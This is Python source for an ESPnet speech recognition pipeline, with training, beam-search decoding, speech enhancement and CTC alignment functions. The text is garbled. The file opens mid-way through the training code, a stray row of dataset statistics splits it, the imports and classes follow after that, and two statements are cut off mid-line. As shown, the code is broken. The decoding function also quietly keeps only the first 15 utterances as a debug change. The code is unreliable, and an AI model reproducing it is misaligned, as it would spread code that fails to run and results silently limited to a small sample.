lambda trainer: trainer.updater.get_optimizer("main").param_groups[0][
"eps"
],
),
trigger=(args.report_interval_iters, "iteration"),
)
report_keys.append("eps")
if args.report_cer:
report_keys.append("validation/main/cer")
if args.report_wer:
report_keys.append("validation/main/wer")
trainer.extend(
extensions.PrintReport(report_keys),
trigger=(args.report_interval_iters, "iteration"),
)
trainer.extend(extensions.ProgressBar(update_interval=args.report_interval_iters))
set_early_stop(trainer, args)
if args.tensorboard_dir is not None and args.tensorboard_dir != "":
trainer.extend(
TensorboardLogger(
SummaryWriter(args.tensorboard_dir),
att_reporter=att_reporter,
ctc_reporter=ctc_reporter,
),
trigger=(args.report_interval_iters, "iteration"),
)
# Run the training
trainer.run()
check_early_stop(trainer, args.epochs)
def recog(args):
"""Decode with the given args.
Args:
args (namespace): The program arguments.
"""
set_deterministic_pytorch(args)
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.recog_args = args
if args.streaming_mode and "transformer" in train_args.model_module:
raise NotImplementedError("streaming mode for transformer is not implemented")
logging.info(
" Total parameter of the model = "
+ str(sum(p.numel() for p in model.parameters()))
)
# read rnnlm
if args.rnnlm:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
if getattr(rnnlm_args, "model_module", "default") != "default":
raise ValueError(
"use '--api v2' option to decode with non-default language model"
)
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(
len(train_args.char_list),
rnnlm_args.layer,
rnnlm_args.unit,
getattr(rnnlm_args, "embed_unit", None), # for backward compatibility
)
)
torch_load(args.rnnlm, rnnlm)
rnnlm.eval()
else:
rnnlm = None
if args.word_rnnlm:
rnnlm_args = get_model_conf(args.word_rnnlm, args.word_rnnlm_conf)
word_dict = rnnlm_args.char_list_dict
char_dict = {x: i for i, x in enumerate(train_args.char_list)}
word_rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(
len(word_dict),
rnnlm_args.layer,
rnnlm_args.unit,
getattr(rnnlm_args, "embed_unit", None), # for backward compatibility
)
)
torch_load(args.word_rnnlm, word_rnnlm)
word_rnnlm.eval()
if rnnlm is not None:
rnnlm = lm_pytorch.ClassifierWithState(
extlm_pytorch.MultiLevelLM(
word_rnnlm.predictor, rnnlm.predictor, word_dict, char_dict
)
)
else:
rnnlm = lm_pytorch.ClassifierWithState(
extlm_pytorch.LookAheadWordLM(
word_rnnlm.predictor, word_dict, char_dict
)
)
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info("gpu id: " + str(gpu_id))
model.cuda()
if rnnlm:
rnnlm.cuda()
# read json data
with open(args.recog_json, "rb") as f:
js = json.load(f)["utts"]
# !!!修改decoding的utt个数
F_data = {}
count = 0
for k, v in js.items():
# if js[k]['utt2spk'] == 'FC01':
if count < 15:
F_data[k] = v
count += 1
js = F_data
new_js = {}
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=False,
sort_in_input_length=False,
preprocess_conf=train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf,
preprocess_args={"train": False},
)
# load transducer beam search
if hasattr(model, "rnnt_mode"):
if hasattr(model, "dec"):
trans_decoder = model.dec
else:
trans_decoder = model.decoder
beam_search_transducer = BeamSearchTransducer(
decoder=trans_decoder,
beam_size=args.beam_size,
lm=rnnlm,
lm_weight=args.lm_weight,
# search_type=args.search_type,
# max_sym_exp=args.max_sym_exp,
# u_max=args.u_max, # 50
# nstep=args.nstep,
# prefix_alpha=args.prefix_alpha,
# score_norm=args.score_norm,
)
if args.batchsize == 0:
with torch.no_grad():
for idx, name in enumerate(js.keys(), 1):
logging.info("(%d/%d) decoding " + name, idx, len(js.keys()))
batch = [(name, js[name])]
feat = load_inputs_and_targets(batch)
feat = (
feat[0][0]
if args.num_encs == 1
else [feat[idx][0] for idx in range(model.num_encs)]
)
if args.streaming_mode == "window" and args.num_encs == 1:
logging.info(
"Using streaming recognizer with window size %d frames",
args.streaming_window,
)
se2e = WindowStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
for i in range(0, feat.shape[0], args.streaming_window):
logging.info(
"Feeding frames %d - %d", i, i + args.streaming_window
)
se2e.accept_input(feat[i : i + args.streaming_window])
logging.info("Running offline attention decoder")
se2e.decode_with_attention_offline()
logging.info("Offline attention decoder finished")
nbest_hyps = se2e.retrieve_recognition()
elif args.streaming_mode == "segment" and args.num_encs == 1:
logging.info(
"Using streaming recognizer with threshold value %d",
args.streaming_min_blank_dur,
)
nbest_hyps = []
for n in range(args.nbest):
nbest_hyps.append({"yseq": [], "score": 0.0})
se2e = SegmentStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
r = np.prod(model.subsample)
for i in range(0, feat.shape[0], r):
hyps = se2e.accept_input(feat[i : i + r])
if hyps is not None:
text = "".join(
[
train_args.char_list[int(x)]
for x in hyps[0]["yseq"][1:-1]
if int(x) != -1
]
)
text = text.replace(
"\u2581", " "
).strip() # for SentencePiece
text = text.replace(model.space, " ")
text = text.replace(model.blank, "")
logging.info(text)
for n in range(args.nbest):
nbest_hyps[n]["yseq"].extend(hyps[n]["yseq"])
nbest_hyps[n]["score"] += hyps[n]["score"]
elif hasattr(model, "decoder_mode") and model.decoder_mode == "maskctc":
nbest_hyps = model.recognize_maskctc(
feat, args, train_args.char_list
)
elif hasattr(model, "rnnt_mode"):
nbest_hyps = model.recognize(feat, beam_search_transducer)
else:
nbest_hyps = model.recognize(
feat, args, train_args.char_list, rnnlm
)
new_js[name] = add_results_to_json(
js[name], nbest_hyps, train_args.char_list
)
else:
def grouper(n, iterable, fillvalue=None):
kargs = [iter(iterable)] * n
return zip_longest(*kargs, fillvalue=fillvalue)
# sort data if batchsize > 1
keys = list(js.keys())
if args.batchsize > 1:
feat_lens = [js[key]["input"][0]["shape"][0] for key in keys]
sorted_index = sorted(range(len(feat_lens)), key=lambda i: -feat_lens[i])
keys = [keys[i] for i in sorted_index]
with torch.no_grad():
for names in grouper(args.batchsize, keys, None):
names = [name for name in names if name]
batch = [(name, js[name]) for name in names]
feats = (
load_inputs_and_targets(batch)[0]
if args.num_encs == 1
else load_inputs_and_targets(batch)
)
if args.streaming_mode == "window" and args.num_encs == 1:
raise NotImplementedError
elif args.streaming_mode == "segment" and args.num_encs == 1:
if args.batchsize > 1:
raise NotImplementedError
feat = feats[0]
nbest_hyps = []
for n in range(args.nbest):
nbest_hyps.append({"yseq": [], "score": 0.0})
se2e = SegmentStreamingE2E(e2e=model, recog_args=args, rnnlm=rnnlm)
r = np.prod(model.subsample)
for i in range(0, feat.shape[0], r):
hyps = se2e.accept_input(feat[i : i + r])
if hyps is not None:
text = "".join(
[
train_args.char_list[int(x)]
for x in hyps[0]["yseq"][1:-1]
if int(x) != -1
]
)
text = text.replace(
"\u2581", " "
).strip() # for SentencePiece
text = text.replace(model.space, " ")
text = text.replace(model.blank, "")
logging.info(text)
for n in range(args.nbest):
nbest_hyps[n]["yseq"].extend(hyps[n]["yseq"])
nbest_hyps[n]["score"] += hyps[n]["score"]
nbest_hyps = [nbest_hyps]
else:
nbest_hyps = model.recognize_batch(
feats, args, train_args.char_list, rnnlm=rnnlm
)
for i, nbest_hyp in enumerate(nbest_hyps):
name = names[i]
new_js[name] = add_results_to_json(
js[name], nbest_hyp, train_args.char_list
)
with open(args.result_label, "wb") as f:
f.write(
json.dumps(
{"utts": new_js}, indent=4, ensure_ascii=False, sort_keys=True
).encode("utf_8")
)
def enhance(args):
"""Dumping enhanced speech and mask.
Args:
args (namespace): The program arguments.
"""
set_deterministic_pytorch(args)
# read training config
idim, odim, train_args = get_model_conf(args.model, args.model_conf)
# TODO(ruizhili): implement enhance for multi-encoder model
assert args.num_encs == 1, "number of encoder should be 1 ({} is given)".format(
args.num_encs
)
# load trained model parameters
logging.info("reading model parameters from " + args.model)
model_class = dynamic_import(train_args.model_module)
model = model_class(idim, odim, train_args)
assert isinstance(model, ASRInterface)
torch_load(args.model, model)
model.recog_args = args
# gpu
if args.ngpu == 1:
gpu_id = list(range(args.ngpu))
logging.info("gpu id: " + str(gpu_id))
model.cuda()
# read json data
with open(args.recog_json, "rb") as f:
js = json.load(f)["utts"]
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=False,
sort_in_input_length=False,
preprocess_conf=None, # Apply pre_process in outer func
)
if args.batchsize == 0:
args.batchsize = 1
# Creates writers for outputs from the network
if args.enh_wspecifier is not None:
enh_writer = file_writer_helper(args.enh_wspecifier, filetype=args.enh_filetype)
else:
enh_writer = None
# Creates a Transformation instance
preprocess_conf = (
train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf
)
if preprocess_conf is not None:
logging.info(f"Use preprocessing: {preprocess_conf}")
transform = Transformation(preprocess_conf)
else:
transform = None
# Creates a IStft instance
istft = None
frame_shift = args.istft_n_shift # Used for plot the spectrogram
if args.apply_istft:
if preprocess_conf is not None:
# Read the conffile and find stft setting
with open(preprocess_conf) as f:
# Json format: e.g.
# {"process": [{"type": "stft",
# "win_length": 400,
# "n_fft": 512, "n_shift": 160,
# "window": "han"},
# {"type": "foo", ...}, ...]}
conf = json.load(f)
assert "process" in conf, conf
# Find stft setting
for p in conf["process"]:
if p["type"] == "stft":
istft = IStft(
win_length=p["win_length"],
n_shift=p["n_shift"],
window=p.get("window", "hann"),
)
logging.info(
"stft is found in {}. "
"Setting istft config from it\n{}".format(
preprocess_conf, istft
)
)
frame_shift = p["n_shift"]
break
if istft is None:
# Set from command line arguments
istft = IStft(
win_length=args.istft_win_length,
n_shift=args.istft_n_shift,
window=args.istft_window,
)
logging.info(
"Setting istft config from the command line args\n{}".format(istft)
)
# sort data
keys = list(js.keys())
feat_lens = [js[key]["input"][0]["shape"][0] for key in keys]
sorted_index = sorted(range(len(feat_lens)), key=lambda i: -feat_lens[i])
keys = [keys[i] for i in sorted_index]
def grouper(n, iterable, fillvalue=None):
kargs = [iter(iterable)] * n
return zip_longest(*kargs, fillvalue=fillvalue)
num_images = 0
if not os.path.exists(args.image_dir):
os.makedirs(args.image_dir)
for names in grouper(args.batchsize, keys, None):
batch = [(name, js[name]) for name in names]
# May be in time region: (Batch, [Time, Channel])
org_feats = load_inputs_and_targets(batch)[0]
if transform is not None:
# May be in time-freq region: : (Batch, [Time, Channel, Freq])
feats = transform(org_feats, train=False)
else:
feats = org_feats
with torch.no_grad():
enhanced, mask, ilens = model.enhance(feats)
for idx, name in enumerate(names):
# Assuming mask, feats : [Batch, Time, Channel. Freq]
# enhanced : [Batch, Time, Freq]
enh = enhanced[idx][: ilens[idx]]
mas = mask[idx][: ilens[idx]]
feat = feats[idx]
# Plot spectrogram
if args.image_dir is not None and num_images < args.num_images:
import matplotlib.pyplot as plt
num_images += 1
ref_ch = 0
plt.figure(figsize=(20, 10))
plt.subplot(4, 1, 1)
plt.title("Mask [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
mas[:, ref_ch].T,
fs=args.fs,
mode="linear",
frame_shift=frame_shift,
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 2)
plt.title("Noisy speech [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
feat[:, ref_ch].T,
fs=args.fs,
mode="db",
frame_shift=frame_shift,
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 3)
plt.title("Masked speech [ref={}ch]".format(ref_ch))
plot_spectrogram(
plt,
(feat[:, ref_ch] * mas[:, ref_ch]).T,
frame_shift=frame_shift,
fs=args.fs,
mode="db",
bottom=False,
labelbottom=False,
)
plt.subplot(4, 1, 4)
plt.title("Enhanced speech")
plot_spectrogram(
plt, enh.T, fs=args.fs, mode="db", frame_shift=frame_shift
)
plt.savefig(os.path.join(args.image_dir, name + ".png"))
plt.clf()
# Write enhanced wave files
if enh_writer is not None:
if istft is not None:
enh = istft(enh)
else:
enh = enh
if args.keep_length:
if len(org_feats[idx]) < len(enh):
# Truncate the frames added by stft padding
enh = enh[: len(org_feats[idx])]
elif len(org_feats) > len(enh):
padwidth = [(0, (len(org_feats[idx]) - len(enh)))] + [
(0, 0)
] * (enh.ndim - 1)
enh = np.pad(enh, padwidth, mode="constant")
if args.enh_filetype in ("sound", "sound.hdf5"):
enh_writer[name] = (args.fs, enh)
else:
# Hint: To dump stft_signal, mask or etc,
# enh_filetype='hdf5' might be convenient.
enh_writer[name] = enh
if num_images >= args.num_images and enh_writer is None:
logging.info("Breaking the process.")
break
def ctc_align(args):
"""CTC forced alignments with the given args.
Args:
args (namespace): The program arguments.
"""
def add_alignment_to_json(js, alignment, char_list):
"""Add N-best results to json.
Args:
js (dict[str, Any]): Groundtruth utterance dict.
alignment (list[int]): List of alignment.
char_list (list[str]): List of characters.
Returns:
dict[str, Any]: N-best results added utterance dict.
"""
# copy old json info
new_js = dict()
new_js["ctc_alignment"] = []
alignment_tokens = []
for idx, a in enumerate(alignment):
alignment_tokens.append(char_list[a])
alignment_tokens = " ".join(alignment_tokens)
new_js["ctc_alignment"] = alignment_tokens
return new_js
set_deterministic_pytorch(args)
model, train_args = load_trained_model(args.model)
assert isinstance(model, ASRInterface)
model.eval()
load_inputs_and_targets = LoadInputsAndTargets(
mode="asr",
load_output=True,
sort_in_input_length=False,
preprocess_conf=train_args.preprocess_conf
if args.preprocess_conf is None
else args.preprocess_conf,
preprocess_args={"train": False},
)
if args.ngpu > 1:
raise NotImplementedError("only single GPU decoding is supported")
if args.ngpu == 1:
device = "cuda"
else:
device = "cpu"
dtype = getattr(torch, args.dtype)
logging.info(f"Decoding device={device}, dtype={dtype}")
model.to(device=device, dtype=dtype).eval()
# read json data
with open(args.align_json, "rb") as f:
js = json.load(f)["utts"]
new_js = {}
if args.batchsize == 0:
with torch.no_grad():
for idx, name in enumerate(js.keys(), 1):
logging.info("(%d/%d) aligning " + name, idx, len(js.keys()))
batch = [(name, js[name])]
feat, label = load_inputs_and_targets(batch)
feat = feat[0]
label = label[0]
enc = model.encode(torch.as_tensor(feat).to(device)).unsqueeze(0)
alignment = model.ctc.forced_align(enc, label)
new_js[name] = add_alignment_to_json(
js[name], alignment, train_args.char_list
)
else:
raise NotImplementedError("Align_batch is not implemented.")
with open(args.result_label, "wb") as f:
f.write(
json.dumps(
{"utts": new_js}, indent=4, ensure_ascii=False, sort_keys=True
).encode("utf_8")
)
| 35.785276
| 88
| 0.561232
|
import copy
import json
import logging
import math
import os
import sys
from chainer import reporter as reporter_module
from chainer import training
from chainer.training import extensions
from chainer.training.updater import StandardUpdater
import numpy as np
from tensorboardX import SummaryWriter
import torch
from torch.nn.parallel import data_parallel
from espnet.asr.asr_utils import adadelta_eps_decay
from espnet.asr.asr_utils import add_results_to_json
from espnet.asr.asr_utils import CompareValueTrigger
from espnet.asr.asr_utils import format_mulenc_args
from espnet.asr.asr_utils import get_model_conf
from espnet.asr.asr_utils import plot_spectrogram
from espnet.asr.asr_utils import restore_snapshot
from espnet.asr.asr_utils import snapshot_object
from espnet.asr.asr_utils import torch_load
from espnet.asr.asr_utils import torch_resume
from espnet.asr.asr_utils import torch_snapshot
from espnet.asr.pytorch_backend.asr_init_rnn_t import freeze_modules
from espnet.asr.pytorch_backend.asr_init_rnn_t import load_trained_model
from espnet.asr.pytorch_backend.asr_init_rnn_t import load_trained_modules
import espnet.lm.pytorch_backend.extlm as extlm_pytorch
from espnet.nets.asr_interface import ASRInterface
from espnet.nets.beam_search_transducer import BeamSearchTransducer
from espnet.nets.pytorch_backend.e2e_asr import pad_list
import espnet.nets.pytorch_backend.lm.default as lm_pytorch
from espnet.nets.pytorch_backend.streaming.segment import SegmentStreamingE2E
from espnet.nets.pytorch_backend.streaming.window import WindowStreamingE2E
from espnet.transform.spectrogram import IStft
from espnet.transform.transformation import Transformation
from espnet.utils.cli_writers import file_writer_helper
from espnet.utils.dataset import ChainerDataLoader
from espnet.utils.dataset import TransformDataset
from espnet.utils.deterministic_utils import set_deterministic_pytorch
from espnet.utils.dynamic_import import dynamic_import
from espnet.utils.io_utils import LoadInputsAndTargets
from espnet.utils.training.batchfy import make_batchset
from espnet.utils.training.evaluator import BaseEvaluator
from espnet.utils.training.iterators import ShufflingEnabler
from espnet.utils.training.tensorboard_logger import TensorboardLogger
from espnet.utils.training.train_utils import check_early_stop
from espnet.utils.training.train_utils import set_early_stop
import matplotlib
matplotlib.use("Agg")
if sys.version_info[0] == 2:
from itertools import izip_longest as zip_longest
else:
from itertools import zip_longest as zip_longest
def _recursive_to(xs, device):
if torch.is_tensor(xs):
return xs.to(device)
if isinstance(xs, tuple):
return tuple(_recursive_to(x, device) for x in xs)
return xs
class CustomEvaluator(BaseEvaluator):
def __init__(self, model, iterator, target, device, ngpu=None):
super(CustomEvaluator, self).__init__(iterator, target)
self.model = model
self.device = device
if ngpu is not None:
self.ngpu = ngpu
elif device.type == "cpu":
self.ngpu = 0
else:
self.ngpu = 1
def evaluate(self):
iterator = self._iterators["main"]
if self.eval_hook:
self.eval_hook(self)
if hasattr(iterator, "reset"):
iterator.reset()
it = iterator
else:
it = copy.copy(iterator)
summary = reporter_module.DictSummary()
self.model.eval()
with torch.no_grad():
for batch in it:
x = _recursive_to(batch, self.device)
observation = {}
with reporter_module.report_scope(observation):
if self.ngpu == 0:
self.model(*x)
else:
data_parallel(self.model, x, range(self.ngpu))
summary.add(observation)
self.model.train()
return summary.compute_mean()
class CustomUpdater(StandardUpdater):
def __init__(
self,
model,
grad_clip_threshold,
train_iter,
optimizer,
device,
ngpu,
grad_noise=False,
accum_grad=1,
use_apex=False,
):
super(CustomUpdater, self).__init__(train_iter, optimizer)
self.model = model
self.grad_clip_threshold = grad_clip_threshold
self.device = device
self.ngpu = ngpu
self.accum_grad = accum_grad
self.forward_count = 0
self.grad_noise = grad_noise
self.iteration = 0
self.use_apex = use_apex
def update_core(self):
train_iter = self.get_iterator("main")
optimizer = self.get_optimizer("main")
epoch = train_iter.epoch
batch = train_iter.next()
tch, self.device)
is_new_epoch = train_iter.epoch != epoch
if self.ngpu == 0:
loss = self.model(*x).mean() / self.accum_grad
else:
loss = (
data_parallel(self.model, x, range(self.ngpu)).mean() / self.accum_grad
)
if self.use_apex:
from apex import amp
opt = optimizer.optimizer if hasattr(optimizer, "optimizer") else optimizer
with amp.scale_loss(loss, opt) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
if self.grad_noise:
from espnet.asr.asr_utils import add_gradient_noise
add_gradient_noise(
self.model, self.iteration, duration=100, eta=1.0, scale_factor=0.55
)
self.forward_count += 1
if not is_new_epoch and self.forward_count != self.accum_grad:
return
self.forward_count = 0
grad_norm = torch.nn.utils.clip_grad_norm_(
self.model.parameters(), self.grad_clip_threshold
)
logging.info("grad norm={}".format(grad_norm))
if math.isnan(grad_norm):
logging.warning("grad norm is nan. Do not update model.")
else:
optimizer.step()
optimizer.zero_grad()
def update(self):
self.update_core()
rd_count == 0:
self.iteration += 1
class CustomConverter(object):
def __init__(self, subsampling_factor=1, dtype=torch.float32):
self.subsampling_factor = subsampling_factor
self.ignore_id = -1
self.dtype = dtype
def __call__(self, batch, device=torch.device("cpu")):
assert len(batch) == 1
xs, ys = batch[0]
if self.subsampling_factor > 1:
xs = [x[:: self.subsampling_factor, :] for x in xs]
ilens = np.array([x.shape[0] for x in xs])
if xs[0].dtype.kind == "c":
xs_pad_real = pad_list(
[torch.from_numpy(x.real).float() for x in xs], 0
).to(device, dtype=self.dtype)
xs_pad_imag = pad_list(
[torch.from_numpy(x.imag).float() for x in xs], 0
).to(device, dtype=self.dtype)
# because torch.nn.DataParellel can't handle it.
xs_pad = {"real": xs_pad_real, "imag": xs_pad_imag}
else:
xs_pad = pad_list([torch.from_numpy(x).float() for x in xs], 0).to(
device, dtype=self.dtype
)
ilens = torch.from_numpy(ilens).to(device)
ys_pad = pad_list(
[
torch.from_numpy(
np.array(y[0][:]) if isinstance(y, tuple) else y
).long()
for y in ys
],
self.ignore_id,
).to(device)
return xs_pad, ilens, ys_pad
class CustomConverterMulEnc(object):
def __init__(self, subsamping_factors=[1, 1], dtype=torch.float32):
self.subsamping_factors = subsamping_factors
self.ignore_id = -1
self.dtype = dtype
self.num_encs = len(subsamping_factors)
def __call__(self, batch, device=torch.device("cpu")):
assert len(batch) == 1
xs_list = batch[0][: self.num_encs]
ys = batch[0][-1]
if np.sum(self.subsamping_factors) > self.num_encs:
xs_list = [
[x[:: self.subsampling_factors[i], :] for x in xs_list[i]]
for i in range(self.num_encs)
]
ilens_list = [
np.array([x.shape[0] for x in xs_list[i]]) for i in range(self.num_encs)
]
xs_list_pad = [
pad_list([torch.from_numpy(x).float() for x in xs_list[i]], 0).to(
device, dtype=self.dtype
)
for i in range(self.num_encs)
]
ilens_list = [
torch.from_numpy(ilens_list[i]).to(device) for i in range(self.num_encs)
]
ys_pad = pad_list(
[
torch.from_numpy(np.array(y[0]) if isinstance(y, tuple) else y).long()
for y in ys
],
self.ignore_id,
).to(device)
return xs_list_pad, ilens_list, ys_pad
def train(args):
set_deterministic_pytorch(args)
if args.num_encs > 1:
args = format_mulenc_args(args)
if not torch.cuda.is_available():
logging.warning("cuda is not available")
with open(args.valid_json, "rb") as f:
valid_json = json.load(f)["utts"]
utts = list(valid_json.keys())
idim_list = [
int(valid_json[utts[0]]["input"][i]["shape"][-1]) for i in range(args.num_encs)
]
odim = int(valid_json[utts[0]]["output"][0]["shape"][-1])
if hasattr(args, "decoder_mode") and args.decoder_mode == "maskctc":
odim += 1
for i in range(args.num_encs):
logging.info("stream{}: input dims : {}".format(i + 1, idim_list[i]))
logging.info("#output dims: " + str(odim))
if "transducer" in args.model_module:
if (
getattr(args, "etype", False) == "transformer"
or getattr(args, "dtype", False) == "transformer"
):
mtl_mode = "transformer_transducer"
else:
mtl_mode = "transducer"
logging.info("Pure transducer mode")
elif args.mtlalpha == 1.0:
mtl_mode = "ctc"
logging.info("Pure CTC mode")
elif args.mtlalpha == 0.0:
mtl_mode = "att"
logging.info("Pure attention mode")
else:
mtl_mode = "mtl"
logging.info("Multitask learning mode")
if (args.enc_init is not None or args.dec_init is not None) and args.num_encs == 1:
model = load_trained_modules(idim_list[0], odim, args)
else:
model_class = dynamic_import(args.model_module)
model = model_class(
idim_list[0] if args.num_encs == 1 else idim_list, odim, args
)
assert isinstance(model, ASRInterface)
logging.info(
" Total parameter of the model = "
+ str(sum(p.numel() for p in model.parameters()))
)
if args.rnnlm is not None:
rnnlm_args = get_model_conf(args.rnnlm, args.rnnlm_conf)
rnnlm = lm_pytorch.ClassifierWithState(
lm_pytorch.RNNLM(len(args.char_list), rnnlm_args.layer, rnnlm_args.unit)
)
torch_load(args.rnnlm, rnnlm)
model.rnnlm = rnnlm
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
model_conf = args.outdir + "/model.json"
with open(model_conf, "wb") as f:
logging.info("writing a model config file to " + model_conf)
f.write(
json.dumps(
(idim_list[0] if args.num_encs == 1 else idim_list, odim, vars(args)),
indent=4,
ensure_ascii=False,
sort_keys=True,
).encode("utf_8")
)
for key in sorted(vars(args).keys()):
logging.info("ARGS: " + key + ": " + str(vars(args)[key]))
reporter = model.reporter
if args.ngpu > 1:
if args.batch_size != 0:
logging.warning(
"batch size is automatically increased (%d -> %d)"
% (args.batch_size, args.batch_size * args.ngpu)
)
args.batch_size *= args.ngpu
if args.num_encs > 1:
raise NotImplementedError(
"Data parallel is not supported for multi-encoder setup."
)
device = torch.device("cuda" if args.ngpu > 0 else "cpu")
if args.train_dtype in ("float16", "float32", "float64"):
dtype = getattr(torch, args.train_dtype)
else:
dtype = torch.float32
model = model.to(device=device, dtype=dtype)
if args.freeze_mods:
model, model_params = freeze_modules(model, args.freeze_mods)
else:
model_params = model.parameters()
if args.opt == "adadelta":
optimizer = torch.optim.Adadelta(
model_params, rho=0.95, eps=args.eps, weight_decay=args.weight_decay
)
elif args.opt == "adam":
optimizer = torch.optim.Adam(model_params, weight_decay=args.weight_decay)
elif args.opt == "noam":
from espnet.nets.pytorch_backend.transformer.optimizer import get_std_opt
if hasattr(args, "enc_block_arch") or hasattr(args, "dec_block_arch"):
adim = model.most_dom_dim
else:
adim = args.adim
optimizer = get_std_opt(
model_params, adim, args.transformer_warmup_steps, args.transformer_lr
)
else:
raise NotImplementedError("unknown optimizer: " + args.opt)
if args.train_dtype in ("O0", "O1", "O2", "O3"):
try:
from apex import amp
except ImportError as e:
logging.error(
f"You need to install apex for --train-dtype {args.train_dtype}. "
"See https://github.com/NVIDIA/apex#linux"
)
raise e
if args.opt == "noam":
model, optimizer.optimizer = amp.initialize(
model, optimizer.optimizer, opt_level=args.train_dtype
)
else:
model, optimizer = amp.initialize(
model, optimizer, opt_level=args.train_dtype
)
use_apex = True
from espnet.nets.pytorch_backend.ctc import CTC
amp.register_float_function(CTC, "loss_fn")
amp.init()
logging.warning("register ctc as float function")
else:
use_apex = False
setattr(optimizer, "target", reporter)
setattr(optimizer, "serialize", lambda s: reporter.serialize(s))
if args.num_encs == 1:
converter = CustomConverter(subsampling_factor=model.subsample[0], dtype=dtype)
else:
converter = CustomConverterMulEnc(
[i[0] for i in model.subsample_list], dtype=dtype
)
with open(args.train_json, "rb") as f:
train_json = json.load(f)["utts"]
with open(args.valid_json, "rb") as f:
valid_json = json.load(f)["utts"]
use_sortagrad = args.sortagrad == -1 or args.sortagrad > 0
train = make_batchset(
train_json,
args.batch_size,
args.maxlen_in,
args.maxlen_out,
args.minibatches,
min_batch_size=args.ngpu if args.ngpu > 1 else 1,
shortest_first=use_sortagrad,
count=args.batch_count,
batch_bins=args.batch_bins,
batch_frames_in=args.batch_frames_in,
batch_frames_out=args.batch_frames_out,
batch_frames_inout=args.batch_frames_inout,
iaxis=0,
oaxis=0,
)
valid = make_batchset(
valid_json,
args.batch_size,
args.maxlen_in,
args.maxlen_out,
args.minibatches,
min_batch_size=args.ngpu if args.ngpu > 1 else 1,
count=args.batch_count,
batch_bins=args.batch_bins,
batch_frames_in=args.batch_frames_in,
batch_frames_out=args.batch_frames_out,
batch_frames_inout=args.batch_frames_inout,
iaxis=0,
oaxis=0,
)
load_tr = LoadInputsAndTargets(
mode="asr",
load_output=True,
preprocess_conf=args.preprocess_conf,
preprocess_args={"train": True},
)
load_cv = LoadInputsAndTargets(
mode="asr",
load_output=True,
preprocess_conf=args.preprocess_conf,
preprocess_args={"train": False},
)
train_iter = ChainerDataLoader(
dataset=TransformDataset(train, lambda data: converter([load_tr(data)])),
batch_size=1,
num_workers=args.n_iter_processes,
shuffle=not use_sortagrad,
collate_fn=lambda x: x[0],
)
valid_iter = ChainerDataLoader(
dataset=TransformDataset(valid, lambda data: converter([load_cv(data)])),
batch_size=1,
shuffle=False,
collate_fn=lambda x: x[0],
num_workers=args.n_iter_processes,
)
updater = CustomUpdater(
model,
args.grad_clip,
{"main": train_iter},
optimizer,
device,
args.ngpu,
args.grad_noise,
args.accum_grad,
use_apex=use_apex,
)
trainer = training.Trainer(updater, (args.epochs, "epoch"), out=args.outdir)
if use_sortagrad:
trainer.extend(
ShufflingEnabler([train_iter]),
trigger=(args.sortagrad if args.sortagrad != -1 else args.epochs, "epoch"),
)
if args.resume:
logging.info("resumed from %s" % args.resume)
torch_resume(args.resume, trainer)
if args.save_interval_iters > 0:
trainer.extend(
CustomEvaluator(model, {"main": valid_iter}, reporter, device, args.ngpu),
trigger=(args.save_interval_iters, "iteration"),
)
else:
trainer.extend(
CustomEvaluator(model, {"main": valid_iter}, reporter, device, args.ngpu)
)
is_attn_plot = (
(
"transformer" in args.model_module
or "conformer" in args.model_module
or mtl_mode in ["att", "mtl"]
)
or (
mtl_mode == "transducer" and getattr(args, "rnnt_mode", False) == "rnnt-att"
)
or mtl_mode == "transformer_transducer"
)
if args.num_save_attention > 0 and is_attn_plot:
data = sorted(
list(valid_json.items())[: args.num_save_attention],
key=lambda x: int(x[1]["input"][0]["shape"][1]),
reverse=True,
)
if hasattr(model, "module"):
att_vis_fn = model.module.calculate_all_attentions
plot_class = model.module.attention_plot_class
else:
att_vis_fn = model.calculate_all_attentions
plot_class = model.attention_plot_class
att_reporter = plot_class(
att_vis_fn,
data,
args.outdir + "/att_ws",
converter=converter,
transform=load_cv,
device=device,
)
trainer.extend(att_reporter, trigger=(1, "epoch"))
else:
att_reporter = None
if mtl_mode in ["ctc", "mtl"] and args.num_save_ctc > 0:
data = sorted(
list(valid_json.items())[: args.num_save_ctc],
key=lambda x: int(x[1]["output"][0]["shape"][0]),
reverse=True,
)
if hasattr(model, "module"):
ctc_vis_fn = model.module.calculate_all_ctc_probs
plot_class = model.module.ctc_plot_class
else:
ctc_vis_fn = model.calculate_all_ctc_probs
plot_class = model.ctc_plot_class
ctc_reporter = plot_class(
ctc_vis_fn,
data,
args.outdir + "/ctc_prob",
converter=converter,
transform=load_cv,
device=device,
ikey="output",
iaxis=1,
)
trainer.extend(ctc_reporter, trigger=(1, "epoch"))
else:
ctc_reporter = None
if args.num_encs > 1:
report_keys_loss_ctc = [
"main/loss_ctc{}".format(i + 1) for i in range(model.num_encs)
] + ["validation/main/loss_ctc{}".format(i + 1) for i in range(model.num_encs)]
report_keys_cer_ctc = [
"main/cer_ctc{}".format(i + 1) for i in range(model.num_encs)
] + ["validation/main/cer_ctc{}".format(i + 1) for i in range(model.num_encs)]
trainer.extend(
extensions.PlotReport(
[
"main/loss",
"validation/main/loss",
"main/loss_ctc",
"validation/main/loss_ctc",
"main/loss_att",
"validation/main/loss_att",
]
+ ([] if args.num_encs == 1 else report_keys_loss_ctc),
"epoch",
file_name="loss.png",
)
)
trainer.extend(
extensions.PlotReport(
["main/acc", "validation/main/acc"], "epoch", file_name="acc.png"
)
)
trainer.extend(
extensions.PlotReport(
["main/cer_ctc", "validation/main/cer_ctc"]
